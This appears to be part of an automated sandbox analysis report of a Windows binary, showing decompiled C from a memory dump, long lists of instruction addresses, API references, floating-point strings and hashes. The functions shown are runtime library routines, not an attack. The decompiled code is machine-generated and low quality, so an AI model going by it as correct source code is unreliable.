							_t1240 = _v1936;
							if(_v1936 != 0) {
								E00CF69F8(_t1029, _t1240,  &_v1944);
							}
							return E00CBDC11(_v8 ^ _t1222);
						}
					}
				}
			}

0x00cf26b6
0x00cf26b9
0x00cf26bb
0x00cf26c1
0x00cf26c8
0x00cf26ce
0x00cf26d7
0x00cf26e4
0x00cf26f5
0x00cf2707
0x00cf270d
0x00cf26f7
0x00cf26f7
0x00cf26f7
0x00cf2714
0x00cf2715
0x00cf2719
0x00cf271f
0x00cf2720
0x00cf2722
0x00cf272f
0x00cf272a
0x00cf272c
0x00cf272c
0x00cf2731
0x00cf2737
0x00cf273d
0x00cf2741
0x00cf274e
0x00cf2776
0x00cf277a
0x00cf2780
0x00cf2782
0x00cf278a
0x00cf278a
0x00cf2791
0x00cf2791
0x00cf2794
0x00cf39fe
0x00000000
0x00cf279a
0x00cf279a
0x00cf279a
0x00cf279d
0x00cf39e1
0x00000000
0x00cf27a3
0x00cf27a3
0x00cf27a3
0x00cf27a6
0x00cf39da
0x00000000
0x00cf27ac
0x00cf27ac
0x00cf27af
0x00cf39d3
0x00cf39e6
0x00cf39e6
0x00cf39e9
0x00cf39ef
0x00000000
0x00cf27b5
0x00cf27be
0x00cf27c6
0x00cf27c9
0x00cf27cc
0x00cf27cf
0x00cf27d5
0x00cf27dd
0x00cf27e3
0x00cf27ed
0x00cf27ed
0x00cf27f0
0x00cf27f9
0x00cf2800
0x00cf2800
0x00cf27f2
0x00cf27f6
0x00cf27f6
0x00cf2808
0x00cf2810
0x00cf2816
0x00cf2818
0x00cf2821
0x00cf2827
0x00cf282c
0x00cf282d
0x00cf282e
0x00cf283d
0x00cf283f
0x00cf2847
0x00cf2848
0x00cf284e
0x00cf2858
0x00cf2858
0x00cf285a
0x00cf2850
0x00cf2850
0x00cf2856
0x00000000
0x00000000
0x00cf2856
0x00cf2860
0x00cf286e
0x00cf2870
0x00cf2879
0x00cf287f
0x00cf2886
0x00cf2887
0x00cf288d
0x00cf2893
0x00cf2c75
0x00cf2c78
0x00cf2d90
0x00cf2d90
0x00cf2d97
0x00cf2d97
0x00cf2d97
0x00cf2d9e
0x00cf2da1
0x00cf2da6
0x00cf2da6
0x00cf2da3
0x00cf2da3
0x00cf2da3
0x00cf2da8
0x00cf2daa
0x00cf2daa
0x00cf2db2
0x00cf2db8
0x00cf2dba
0x00cf2dbd
0x00cf2dc3
0x00cf2dc5
0x00cf2dc5
0x00cf2dc7
0x00cf2dd8
0x00cf2dd8
0x00cf2dd8
0x00cf2dc9
0x00cf2dd0
0x00cf2dd0
0x00cf2ddf
0x00cf2de2
0x00cf2de4
0x00cf2dea
0x00cf2dea
0x00cf2de6
0x00cf2de6
0x00cf2de6
0x00cf2df2
0x00cf2dfc
0x00cf2e03
0x00cf2e04
0x00cf2e07
0x00000000
0x00000000
0x00cf2e09
0x00cf2e09
0x00cf2e11
0x00cf2e17
0x00cf2e1a
0x00cf2e27
0x00cf2e1c
0x00cf2e1f
0x00cf2e1f
0x00cf2e40
0x00cf2e4c
0x00cf2e59
0x00cf2e5b
0x00cf2c7e
0x00cf2c7e
0x00cf2c85
0x00cf2c8f
0x00cf2c99
0x00cf2c9b
0x00cf2ca1
0x00cf2ca1
0x00cf2ca3
0x00cf2ca3
0x00cf2caa
0x00cf2cb1
0x00000000
0x00000000
0x00cf2cb7
0x00cf2cba
0x00cf2cbd
0x00000000
0x00cf2cbf
0x00cf2cbf
0x00cf2cbf
0x00cf2cbf
0x00cf2cc6
0x00cf2cc9
0x00cf2cce
0x00cf2cce
0x00cf2ccb
0x00cf2ccb
0x00cf2ccb
0x00cf2cd0
0x00cf2cd2
0x00cf2cd2
0x00cf2cda
0x00cf2ce0
0x00cf2ce2
0x00cf2ce5
0x00cf2ceb
0x00cf2ced
0x00cf2ced
0x00cf2cef
0x00cf2d00
0x00cf2d00
0x00cf2d00
0x00cf2cf1
0x00cf2cf8
0x00cf2cf8
0x00cf2d07
0x00cf2d0a
0x00cf2d0c
0x00cf2d12
0x00cf2d12
0x00cf2d0e
0x00cf2d0e
0x00cf2d0e
0x00cf2d1a
0x00cf2d25
0x00cf2d2c
0x00cf2d2d
0x00cf2d30
0x00000000
0x00000000
0x00cf2d32
0x00cf2d32
0x00cf2d3a
0x00cf2d40
0x00cf2d43
0x00cf2d50
0x00cf2d45
0x00cf2d48
0x00cf2d48
0x00cf2d69
0x00cf2d75
0x00cf2d84
0x00cf2d84
0x00000000
0x00cf2cbd
0x00cf2ca3
0x00000000
0x00cf2c9b
0x00cf2e62
0x00cf2e62
0x00cf2e65
0x00cf2e6a
0x00cf2e70
0x00cf2e76
0x00cf2e76
0x00cf2e79
0x00cf2e80
0x00cf2e87
0x00cf2e88
0x00cf2e89
0x00cf2e8e
0x00cf2899
0x00cf2899
0x00cf28a0
0x00cf28aa
0x00cf28b4
0x00cf28b6
0x00cf2ab2
0x00cf2ab2
0x00cf2abe
0x00cf2ac1
0x00cf2ac6
0x00cf2ace
0x00cf2ad5
0x00cf2adb
0x00cf2ae0
0x00cf2ae7
0x00cf2ae8
0x00cf2ae8
0x00cf2ae8
0x00cf2aef
0x00cf2af2
0x00cf2afa
0x00cf2b00
0x00cf2b07
0x00cf2b07
0x00cf2b02
0x00cf2b02
0x00cf2b02
0x00cf2b09
0x00cf2b0c
0x00cf2b0e
0x00cf2b14
0x00cf2b1a
0x00cf2b1d
0x00cf2b2b
0x00cf2b2b
0x00cf2b2b
0x00cf2b1f
0x00cf2b1f
0x00cf2b25
0x00000000
0x00cf2b27
0x00cf2b27
0x00cf2b27
0x00cf2b25
0x00cf2b2d
0x00cf2b30
0x00cf2c23
0x00cf2c23
0x00cf2c25
0x00cf2c2a
0x00cf2c2b
0x00cf2c31
0x00cf2c3d
0x00cf2c44
0x00cf2c45
0x00cf2c46
0x00cf2c4b
0x00cf2b36
0x00cf2b36
0x00cf2b38
0x00000000
0x00cf2b3e
0x00cf2b3e
0x00cf2b41
0x00cf2b45
0x00cf2b46
0x00cf2b46
0x00cf2b4c
0x00cf2b4e
0x00cf2b54
0x00cf2b57
0x00cf2b5d
0x00cf2b65
0x00cf2b65
0x00cf2b6d
0x00cf2b70
0x00cf2b70
0x00cf2b72
0x00000000
0x00000000
0x00cf2b74
0x00cf2b76
0x00cf2b7c
0x00cf2b7c
0x00cf2b78
0x00cf2b78
0x00cf2b78
0x00cf2b7e
0x00cf2b87
0x00cf2b89
0x00cf2b90
0x00cf2b90
0x00cf2b8b
0x00cf2b8b
0x00cf2b8b
0x00cf2b98
0x00cf2bb7
0x00cf2bbf
0x00cf2bc6
0x00cf2bc7
0x00cf2bc8
0x00cf2bce
0x00cf2bd1
0x00cf2bd3
0x00000000
0x00cf2bd3
0x00000000
0x00cf2bd1
0x00cf2bdb
0x00cf2be1
0x00cf2be7
0x00cf2be7
0x00cf2bed
0x00cf2bef
0x00cf2bf9
0x00cf2bfb
0x00cf2bfb
0x00cf2bfd
0x00cf2bfd
0x00cf2c03
0x00cf2c08
0x00cf2c0e
0x00cf2c1b
0x00cf2c10
0x00cf2c13
0x00cf2c13
0x00cf2c0e
0x00cf2b38
0x00cf2c4e
0x00cf2c58
0x00cf2c62
0x00cf2c68
0x00cf2c6e
0x00cf28bc
0x00cf28bc
0x00cf28bc
0x00cf28be
0x00cf28c5
0x00cf28cc
0x00000000
0x00000000
0x00cf28d2
0x00cf28d5
0x00cf28d8
0x00000000
0x00cf28da
0x00cf28da
0x00cf28e6
0x00cf28e9
0x00cf28ee
0x00cf28f6
0x00cf28fd
0x00cf2903
0x00cf2908
0x00cf290f
0x00cf2910
0x00cf2910
0x00cf2910
0x00cf2917
0x00cf291a
0x00cf2922
0x00cf2928
0x00cf292f
0x00cf292f
0x00cf292a
0x00cf292a
0x00cf292a
0x00cf2931
0x00cf2934
0x00cf2936
0x00cf293c
0x00cf2942
0x00cf2945
0x00cf2953
0x00cf2953
0x00cf2953
0x00cf2947
0x00cf2947
0x00cf294d
0x00000000
0x00cf294f
0x00cf294f
0x00cf294f
0x00cf294d
0x00cf2955
0x00cf2958
0x00cf2a4b
0x00cf2a4b
0x00cf2a4d
0x00cf2a52
0x00cf2a53
0x00cf2a59
0x00cf2a65
0x00cf2a6c
0x00cf2a6d
0x00cf2a6e
0x00cf2a73
0x00cf295e
0x00cf295e
0x00cf2960
0x00000000
0x00cf2966
0x00cf2966
0x00cf2969
0x00cf296d
0x00cf296e
0x00cf296e
0x00cf2974
0x00cf2976
0x00cf297c
0x00cf297f
0x00cf2985
0x00cf298d
0x00cf298d
0x00cf2995
0x00cf2998
0x00cf2998
0x00cf299a
0x00000000
0x00000000
0x00cf299c
0x00cf299e
0x00cf29a4
0x00cf29a4
0x00cf29a0
0x00cf29a0
0x00cf29a0
0x00cf29a6
0x00cf29af
0x00cf29b1
0x00cf29b8
0x00cf29b8
0x00cf29b3
0x00cf29b3
0x00cf29b3
0x00cf29c0
0x00cf29df
0x00cf29e7
0x00cf29ee
0x00cf29ef
0x00cf29f0
0x00cf29f6
0x00cf29f9
0x00cf29fb
0x00000000
0x00cf29fb
0x00000000
0x00cf29f9
0x00cf2a03
0x00cf2a09
0x00cf2a0f
0x00cf2a0f
0x00cf2a15
0x00cf2a17
0x00cf2a21
0x00cf2a23
0x00cf2a23
0x00cf2a25
0x00cf2a25
0x00cf2a2b
0x00cf2a30
0x00cf2a36
0x00cf2a43
0x00cf2a38
0x00cf2a3b
0x00cf2a3b
0x00cf2a36
0x00cf2960
0x00cf2a76
0x00cf2a81
0x00cf2a82
0x00cf2a83
0x00cf2a89
0x00cf2a8f
0x00cf2a95
0x00cf2a95
0x00000000
0x00cf28d8
0x00000000
0x00cf28be
0x00cf2a96
0x00cf2a9c
0x00cf2aa3
0x00cf2aa4
0x00cf2aa5
0x00cf2aaa
0x00cf2aaa
0x00cf2e91
0x00cf2e9b
0x00cf2e9c
0x00cf2ea2
0x00cf2ea4
0x00cf3304
0x00cf3306
0x00cf3308
0x00cf330e
0x00cf3310
0x00cf3316
0x00cf3318
0x00cf3665
0x00cf3665
0x00cf3667
0x00cf366d
0x00cf3674
0x00cf367a
0x00cf367c
0x00cf371a
0x00cf371a
0x00cf371c
0x00cf371d
0x00cf3723
0x00000000
0x00cf3682
0x00cf3682
0x00cf3685
0x00cf368b
0x00cf3691
0x00cf3693
0x00cf3699
0x00cf369b
0x00cf369b
0x00cf369d
0x00cf369d
0x00cf36a6
0x00cf36ad
0x00cf36b3
0x00cf36b6
0x00cf36b7
0x00cf36b9
0x00cf36b9
0x00cf36bd
0x00cf36bf
0x00cf36c1
0x00cf36c7
0x00cf36ca
0x00000000
0x00cf36cc
0x00cf36cc
0x00cf36d3
0x00cf36d3
0x00cf36ca
0x00cf36bf
0x00cf3693
0x00cf3685
0x00cf367c
0x00cf331e
0x00cf331e
0x00cf331e
0x00cf3321
0x00cf3325
0x00cf3325
0x00cf3326
0x00cf3338
0x00cf3345
0x00cf3354
0x00cf337e
0x00cf3383
0x00cf3389
0x00cf338c
0x00cf338f
0x00cf3425
0x00cf342c
0x00cf34b2
0x00cf34b8
0x00cf34be
0x00cf34be
0x00cf34be
0x00cf34c1
0x00cf34c3
0x00cf34c3
0x00cf34c9
0x00cf34cf
0x00cf34d5
0x00cf34d7
0x00cf34d9
0x00cf34d9
0x00cf34df
0x00cf34e5
0x00cf34e7
0x00cf34f3
0x00cf34f9
0x00cf34e9
0x00cf34e9
0x00cf34eb
0x00cf34eb
0x00cf34ff
0x00cf3501
0x00cf3503
0x00cf3503
0x00cf3509
0x00cf350b
0x00cf350d
0x00cf3513
0x00cf3515
0x00cf361c
0x00cf361c
0x00cf3622
0x00cf3622
0x00cf3625
0x00cf3626
0x00000000
0x00cf351b
0x00cf351b
0x00cf351b
0x00cf351f
0x00cf353f
0x00cf3541
0x00cf3543
0x00cf3549
0x00cf354f
0x00cf3551
0x00cf35fe
0x00cf35fe
0x00cf3601
0x00000000
0x00cf3607
0x00cf3607
0x00cf360d
0x00000000
0x00cf360d
0x00cf3557
0x00cf3557
0x00cf3557
0x00cf355a
0x00000000
0x00000000
0x00cf355c
0x00cf355e
0x00cf3566
0x00cf356f
0x00cf356f
0x00cf3571
0x00cf3571
0x00cf3583
0x00cf3586
0x00cf358c
0x00cf3595
0x00cf3598
0x00cf35a5
0x00cf35a8
0x00cf35a9
0x00cf35aa
0x00cf35b0
0x00cf35b2
0x00cf35b8
0x00cf35be
0x00cf35c4
0x00000000
0x00000000
0x00000000
0x00000000
0x00cf35c6
0x00cf35c6
0x00cf35c6
0x00cf35c8
0x00000000
0x00000000
0x00cf35ca
0x00cf35cd
0x00000000
0x00cf35d3
0x00cf35d3
0x00cf35d5
0x00cf35d7
0x00cf35d7
0x00cf35d7
0x00cf35df
0x00cf35e2
0x00cf35e2
0x00cf35e8
0x00cf35ea
0x00cf35ec
0x00cf35f3
0x00cf35f9
0x00cf35fb
0x00000000
0x00cf35fb
0x00000000
0x00cf35cd
0x00000000
0x00cf35c6
0x00000000
0x00cf3557
0x00cf3521
0x00cf3521
0x00cf3523
0x00cf3529
0x00cf3531
0x00cf3531
0x00cf3534
0x00cf3534
0x00000000
0x00cf3523
0x00000000
0x00cf3613
0x00cf3613
0x00cf3614
0x00cf3614
0x00000000
0x00cf351b
0x00cf3432
0x00cf3432
0x00cf343d
0x00cf3444
0x00cf344a
0x00cf3451
0x00cf3457
0x00cf3458
0x00cf3459
0x00cf345e
0x00cf3461
0x00cf3463
0x00000000
0x00cf3469
0x00cf3469
0x00cf346c
0x00000000
0x00cf3472
0x00cf3472
0x00cf3479
0x00000000
0x00cf347f
0x00cf3485
0x00cf3487
0x00cf348d
0x00cf348d
0x00cf348f
0x00cf3491
0x00cf3491
0x00cf3493
0x00cf349c
0x00cf34a3
0x00cf34a6
0x00cf34a7
0x00cf34a9
0x00cf34a9
0x00000000
0x00cf34ad
0x00cf3479
0x00cf346c
0x00cf3463
0x00cf3395
0x00cf3395
0x00cf339b
0x00cf339d
0x00cf33b9
0x00cf33bc
0x00000000
0x00cf33c2
0x00cf33c2
0x00cf33c9
0x00000000
0x00cf33cf
0x00cf33d5
0x00cf33d7
0x00cf33d7
0x00cf33d9
0x00cf33db
0x00cf33db
0x00cf33dd
0x00cf33e6
0x00cf33ed
0x00cf33f0
0x00cf33f1
0x00cf33f3
0x00cf33f3
0x00cf33f7
0x00cf33f7
0x00cf33fc
0x00cf33fe
0x00000000
0x00cf3404
0x00cf3404
0x00cf340a
0x00cf340d
0x00cf36db
0x00cf36dd
0x00cf36de
0x00cf36e4
0x00cf36f0
0x00cf36f7
0x00cf36f8
0x00cf36f9
0x00cf36fe
0x00cf3701
0x00cf3413
0x00cf3413
0x00cf341a
0x00000000
0x00cf341a
0x00cf340d
0x00cf33fe
0x00cf33c9
0x00cf339f
0x00cf339f
0x00cf33a1
0x00cf33a7
0x00cf33ad
0x00cf33ae
0x00cf362c
0x00cf362c
0x00cf3633
0x00cf3634
0x00cf3635
0x00cf363a
0x00cf363d
0x00cf363d
0x00cf363d
0x00cf339d
0x00cf363f
0x00cf363f
0x00cf3641
0x00cf3708
0x00cf370f
0x00cf3716
0x00cf3729
0x00cf372f
0x00cf3730
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00cf3647
0x00cf364d
0x00cf364d
0x00cf3653
0x00cf3653
0x00cf365f
0x00000000
0x00cf365f
0x00cf2eaa
0x00cf2eaa
0x00cf2eac
0x00cf2eb2
0x00cf2eb4
0x00cf2eba
0x00cf2ebc
0x00cf322a
0x00cf322a
0x00cf322c
0x00cf3232
0x00cf3239
0x00cf323f
0x00cf3241
0x00cf32a0
0x00cf32a3
0x00cf32a9
0x00cf32af
0x00cf32b1
0x00cf32b7
0x00cf32b9
0x00cf32b9
0x00cf32bb
0x00cf32bb
0x00cf32c4
0x00cf32cb
0x00cf32d1
0x00cf32d4
0x00cf32d5
0x00cf32d7
0x00cf32d7
0x00cf32db
0x00cf32dd
0x00cf32e3
0x00cf32e9
0x00cf32ec
0x00000000
0x00cf32f2
0x00cf32f2
0x00cf32f9
0x00cf32f9
0x00cf32ec
0x00cf32dd
0x00cf32b1
0x00cf3243
0x00cf3243
0x00cf3245
0x00cf324b
0x00cf3251
0x00000000
0x00cf3251
0x00cf3241
0x00cf2ec2
0x00cf2ec2
0x00cf2ec2
0x00cf2ec5
0x00cf2ec9
0x00cf2ec9
0x00cf2eca
0x00cf2edc
0x00cf2ee9
0x00cf2ef8
0x00cf2f22
0x00cf2f27
0x00cf2f2d
0x00cf2f30
0x00cf2f33
0x00cf2fa7
0x00cf2fae
0x00cf307b
0x00cf3081
0x00cf3087
0x00cf3087
0x00cf3087
0x00cf308a
0x00cf308c
0x00cf308c
0x00cf3092
0x00cf3098
0x00cf309e
0x00cf30a0
0x00cf30a2
0x00cf30a2
0x00cf30a8
0x00cf30ae
0x00cf30b0
0x00cf30bc
0x00cf30c2
0x00cf30b2
0x00cf30b2
0x00cf30b4
0x00cf30b4
0x00cf30c8
0x00cf30ca
0x00cf30cc
0x00cf30cc
0x00cf30d2
0x00cf30d4
0x00cf30d6
0x00cf30dc
0x00cf30de
0x00cf31e5
0x00cf31e5
0x00cf31eb
0x00cf31eb
0x00000000
0x00cf30e4
0x00cf30e4
0x00cf30e4
0x00cf30e8
0x00cf3108
0x00cf310a
0x00cf310c
0x00cf3112
0x00cf3118
0x00cf311a
0x00cf31c7
0x00cf31c7
0x00cf31ca
0x00000000
0x00cf31d0
0x00cf31d0
0x00cf31d6
0x00000000
0x00cf31d6
0x00cf3120
0x00cf3120
0x00cf3120
0x00cf3123
0x00000000
0x00000000
0x00cf3125
0x00cf3127
0x00cf312f
0x00cf3138
0x00cf3138
0x00cf313a
0x00cf313a
0x00cf314c
0x00cf314f
0x00cf3155
0x00cf315e
0x00cf3161
0x00cf316e
0x00cf3171
0x00cf3172
0x00cf3173
0x00cf3179
0x00cf317b
0x00cf3181
0x00cf3187
0x00cf318d
0x00000000
0x00000000
0x00000000
0x00000000
0x00cf318f
0x00cf318f
0x00cf318f
0x00cf3191
0x00000000
0x00000000
0x00cf3193
0x00cf3196
0x00cf3254
0x00cf3254
0x00cf3256
0x00cf325c
0x00cf3262
0x00cf3263
0x00000000
0x00cf319c
0x00cf319c
0x00cf319e
0x00cf31a0
0x00cf31a0
0x00cf31a0
0x00cf31a8
0x00cf31ab
0x00cf31ab
0x00cf31b1
0x00cf31b3
0x00cf31b5
0x00cf31bc
0x00cf31c2
0x00cf31c4
0x00000000
0x00cf31c4
0x00000000
0x00cf3196
0x00000000
0x00cf318f
0x00000000
0x00cf3120
0x00cf30ea
0x00cf30ea
0x00cf30ec
0x00cf30f2
0x00cf30fa
0x00cf30fa
0x00cf30fd
0x00cf30fd
0x00000000
0x00cf30ec
0x00000000
0x00cf31dc
0x00cf31dc
0x00cf31dd
0x00cf31dd
0x00000000
0x00cf30e4
0x00cf2fb4
0x00cf2fb4
0x00cf2fbf
0x00cf2fc6
0x00cf2fcc
0x00cf2fd3
0x00cf2fd9
0x00cf2fda
0x00cf2fdb
0x00cf2fe0
0x00cf2fe3
0x00cf2fe5
0x00cf3001
0x00cf3004
0x00000000
0x00cf300a
0x00cf300a
0x00cf3011
0x00000000
0x00cf3017
0x00cf301d
0x00cf301f
0x00cf3025
0x00cf3025
0x00cf3027
0x00cf3029
0x00cf3029
0x00cf302b
0x00cf3034
0x00cf303b
0x00cf303e
0x00cf303f
0x00cf3041
0x00cf3041
0x00000000
0x00cf3029
0x00cf3011
0x00cf2fe7
0x00cf2fe9
0x00cf2fef
0x00cf2ff5
0x00cf2ff6
0x00000000
0x00cf2ff6
0x00cf2fe5
0x00cf2f35
0x00cf2f35
0x00cf2f3b
0x00cf2f3d
0x00cf2f52
0x00cf2f55
0x00000000
0x00cf2f5b
0x00cf2f5b
0x00cf2f62
0x00000000
0x00cf2f68
0x00cf2f6e
0x00cf2f70
0x00cf2f70
0x00cf2f72
0x00cf2f74
0x00cf2f74
0x00cf2f76
0x00cf2f7f
0x00cf2f86
0x00cf2f89
0x00cf2f8a
0x00cf2f8c
0x00cf2f8c
0x00cf3045
0x00cf3045
0x00cf304a
0x00cf304c
0x00000000
0x00cf3052
0x00cf3052
0x00cf3058
0x00cf305b
0x00cf2f95
0x00cf2f9c
0x00000000
0x00cf3061
0x00cf3063
0x00cf3069
0x00cf306f
0x00cf3070
0x00cf3269
0x00cf3269
0x00cf3270
0x00cf3271
0x00cf3272
0x00cf3277
0x00cf327a
0x00cf327a
0x00cf305b
0x00cf304c
0x00cf2f62
0x00cf2f3f
0x00cf2f3f
0x00cf2f41
0x00cf2f47
0x00cf31ee
0x00cf31ee
0x00cf31ef
0x00cf31f5
0x00cf31f5
0x00cf31fc
0x00cf31fd
0x00cf31fe
0x00cf3203
0x00cf3206
0x00cf3206
0x00cf3206
0x00cf2f3d
0x00cf3208
0x00cf3208
0x00cf320a
0x00cf327e
0x00cf3285
0x00cf3285
0x00cf3285
0x00cf328c
0x00cf328e
0x00cf3294
0x00cf3295
0x00cf3736
0x00cf3736
0x00cf3737
0x00cf3738
0x00cf373d
0x00000000
0x00000000
0x00000000
0x00000000
0x00cf320c
0x00cf3212
0x00cf3212
0x00cf3218
0x00cf3218
0x00cf3224
0x00000000
0x00cf3224
0x00cf2ebc
0x00cf3740
0x00cf3740
0x00cf3746
0x00cf3748
0x00cf374e
0x00cf3754
0x00cf3756
0x00cf375a
0x00cf375c
0x00cf375c
0x00cf375e
0x00cf375f
0x00cf375f
0x00cf3766
0x00cf376a
0x00cf3771
0x00cf3774
0x00cf3775
0x00cf3777
0x00cf3777
0x00cf377b
0x00cf3781
0x00cf3783
0x00cf378e
0x00cf3790
0x00cf3796
0x00cf3799
0x00cf37ac
0x00cf37ae
0x00cf37af
0x00cf37b5
0x00cf37c1
0x00cf37c8
0x00cf37c9
0x00cf37ca
0x00cf37cf
0x00cf379b
0x00cf379d
0x00cf37a4
0x00cf37a4
0x00cf3799
0x00cf37d2
0x00cf37d2
0x00cf37e2
0x00cf37e9
0x00cf37ec
0x00cf3888
0x00cf388a
0x00cf3895
0x00cf3895
0x00cf3897
0x00cf389a
0x00000000
0x00cf388c
0x00cf3892
0x00cf3892
0x00cf37f2
0x00cf37f2
0x00cf37f8
0x00cf37fb
0x00cf3801
0x00cf3804
0x00cf380a
0x00cf380c
0x00cf3814
0x00cf3816
0x00cf3818
0x00cf3818
0x00cf381a
0x00cf381b
0x00cf381b
0x00cf3826
0x00cf382d
0x00cf3830
0x00cf3831
0x00cf3833
0x00cf3833
0x00cf3837
0x00cf3842
0x00cf3844
0x00cf3846
0x00cf384c
0x00cf384f
0x00cf3862
0x00cf3863
0x00cf3869
0x00cf3875
0x00cf387c
0x00cf387d
0x00cf387e
0x00cf3883
0x00cf3851
0x00cf3851
0x00cf3858
0x00cf3858
0x00cf384f
0x00cf3844
0x00cf389c
0x00cf389c
0x00cf389c
0x00cf38a8
0x00cf38ab
0x00cf38b1
0x00cf38b3
0x00cf38b5
0x00cf38bb
0x00cf38bd
0x00cf38bd
0x00cf38bd
0x00cf38bb
0x00cf38c2
0x00cf38c3
0x00cf38c5
0x00cf38c7
0x00cf38c7
0x00cf38c9
0x00cf38cf
0x00cf38d5
0x00cf38d7
0x00cf38dd
0x00cf38dd
0x00cf38e3
0x00cf38e5
0x00000000
0x00000000
0x00cf38eb
0x00cf38ed
0x00cf38ef
0x00cf38ef
0x00cf38f1
0x00cf38f1
0x00cf3901
0x00cf3908
0x00cf390b
0x00cf390c
0x00cf390e
0x00cf390e
0x00cf3917
0x00cf3919
0x00cf391b
0x00cf3921
0x00cf3924
0x00cf3935
0x00cf3937
0x00cf3938
0x00cf393e
0x00cf394a
0x00cf3951
0x00cf3952
0x00cf3953
0x00cf3958
0x00cf3926
0x00cf3926
0x00cf392d
0x00cf392d
0x00cf3924
0x00cf3969
0x00cf3978
0x00cf3979
0x00cf3979
0x00cf397b
0x00cf397d
0x00cf397d
0x00cf3983
0x00cf3986
0x00cf3988
0x00cf398a
0x00cf398a
0x00cf398d
0x00cf398e
0x00cf398e
0x00cf3993
0x00cf3996
0x00cf399a
0x00cf399a
0x00cf399b
0x00cf399d
0x00cf39a3
0x00000000
0x00000000
0x00000000
0x00cf39a3
0x00cf38dd
0x00cf39a9
0x00cf39a9
0x00000000
0x00cf39a9
0x00cf27af
0x00cf27a6
0x00cf279d
0x00cf2750
0x00cf2754
0x00cf275c
0x00000000
0x00cf275e
0x00cf2764
0x00cf2769
0x00cf276c
0x00cf2770
0x00cf39f0
0x00cf39fa
0x00cf3a07
0x00cf3a08
0x00cf3a09
0x00cf3a0a
0x00cf3a0b
0x00cf3a0c
0x00cf3a11
0x00cf3a14
0x00cf3a17
0x00cf3a18
0x00cf3a1b
0x00cf3a1d
0x00cf3a23
0x00cf3a26
0x00cf3a28
0x00cf3a3d
0x00cf3a3e
0x00cf3a41
0x00cf3a43
0x00cf3a59
0x00cf3a5f
0x00cf3a67
0x00cf3a69
0x00cf3a74
0x00cf3a77
0x00cf3a8e
0x00cf3a79
0x00cf3a79
0x00cf3a7e
0x00000000
0x00cf3a7e
0x00cf3a6b
0x00cf3a6b
0x00cf3a70
0x00cf3a80
0x00cf3a80
0x00cf3a81
0x00cf3a83
0x00cf3a88
0x00cf3a88
0x00cf3a45
0x00cf3a45
0x00cf3a48
0x00000000
0x00cf3a4a
0x00cf3a4d
0x00cf3a55
0x00cf3a55
0x00cf3a48
0x00cf3a2a
0x00cf3a2a
0x00cf3a31
0x00cf3a32
0x00cf3a34
0x00cf3a39
0x00cf3a39
0x00cf3a1f
0x00cf3a1f
0x00cf3a1f
0x00cf3a92
0x00cf39fc
0x00cf39ac
0x00cf39ac
0x00cf39b6
0x00cf39bf
0x00cf39c4
0x00cf39d2
0x00cf39d2
0x00cf39fa
0x00cf275c

APIs

__floor_pentium4.LIBCMT ref: 00CF2831

Strings

1#SNAN, xrefs: 00CF39DA
1#INF, xrefs: 00CF39FE
1#IND, xrefs: 00CF39D3
1#QNAN, xrefs: 00CF39E1

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: e6173a930283d0fc747ec08be357f14441c261e9bff64afc44a8adeac824a0b3
Instruction ID: 1a03c92c9b2ca08f0f6ba535aa3750833c275bfab0d95c95d6a9cba6e55c97a2
Opcode Fuzzy Hash: e6173a930283d0fc747ec08be357f14441c261e9bff64afc44a8adeac824a0b3
Instruction Fuzzy Hash: E5C23871E0462C9FDBA5CE28DD407AAB7B5EB48304F1441EAD95DE7240E778AF818F42

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCAC7, Relevance: 9.0, APIs: 6, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00CBCAC7() {
				int _t1;
				intOrPtr _t2;
				void* _t4;
				intOrPtr _t9;
				void* _t13;
				intOrPtr* _t16;

				_t1 = IsProcessorFeaturePresent(0xc);
				if(_t1 != 0) {
					_t16 =  *[fs:0x30] + 0x34;
					_t2 =  *_t16;
					if(_t2 != 0) {
						L7:
						 *0xe390f0 = _t2;
						_t4 = 1;
					} else {
						_t4 = HeapAlloc(GetProcessHeap(), 8, 8);
						_t13 = _t4;
						if(_t13 != 0) {
							__imp__InitializeSListHead(_t13);
							asm("lock cmpxchg [esi], ecx");
							if(0 != 0) {
								HeapFree(GetProcessHeap(), 0, _t13);
							}
							_t2 =  *_t16;
							goto L7;
						}
					}
					return _t4;
				} else {
					_t9 = _t1 + 1;
					 *0xe390f0 = _t9;
					return _t9;
				}
			}

0x00cbcac9
0x00cbcad0
0x00cbcae1
0x00cbcae5
0x00cbcae9
0x00cbcb27
0x00cbcb27
0x00cbcb2e
0x00cbcaeb
0x00cbcaf6
0x00cbcafc
0x00cbcb00
0x00cbcb03
0x00cbcb0d
0x00cbcb13
0x00cbcb1f
0x00cbcb1f
0x00cbcb25
0x00000000
0x00cbcb25
0x00cbcb00
0x00cbcb31
0x00cbcad2
0x00cbcad2
0x00cbcad3
0x00cbcad8
0x00cbcad8

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,00CBC9C3,00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBCAC9
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,0000000C,00CBC9C3,00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBCAEF
HeapAlloc.KERNEL32(00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBCAF6
InitializeSListHead.KERNEL32(00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBCB03
GetProcessHeap.KERNEL32(00000000,00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBCB18
HeapFree.KERNEL32(00000000,?,00CBCB7A,?,?,00CB5090), ref: 00CBCB1F

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

